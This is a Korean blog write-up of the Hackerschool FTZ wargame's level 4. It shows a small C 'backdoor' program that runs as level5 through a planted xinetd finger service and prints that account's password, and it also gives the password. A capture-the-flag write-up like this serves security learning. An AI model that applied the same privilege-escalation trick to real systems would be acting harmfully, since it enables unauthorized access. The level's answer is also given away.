반응형
문제 내용
힌트를 보면 누가 /etc/xinetd.d/ 디렉토리에 백도어를 심어놓았다고 한다.
해당 디렉터리로 이동하겠다.
백도어 파일을 확인하였다. finger라는 서비스를 이용한다.
finger 는 로컬사용자 또는 원격서버사용자의 계정정보를 확인하는 명령어이다.
찾아보니 level5의 권한으로 /home/level4/tmp/backdoor를 실행한다고 한다.
따라서 우리는 /home/level4/tmp/backdoor 파일을 만들어야한다.
backdoor.c 파일
#include<stdio.h>
#include<stdlib.h>
int main(void){
system("my-pass");
return 0;
}
my-pass 명령어를 실행하는 백도어 코드이다.
gcc로 컴파일을 한후 finger @loacalhost를 이용하여 level5의 비밀번호를 출력하였다.
level5 비밀번호 : what is your name?
반응형
'hackerschool 문제 > FTZ' 카테고리의 다른 글
[Hackerschool FTZ] - level 6 문제 (0) | 2022.11.18 |
---|---|
[Hackerschool FTZ] - level 5 문제 (0) | 2022.11.10 |
[Hackerschool FTZ] - level 3 문제 (0) | 2022.10.04 |
[Hackerschool FTZ] - level 2 문제 (2) | 2022.10.03 |
[Hackerschool FTZ] - level 1 문제(환경 설정 포함) (2) | 2022.10.02 |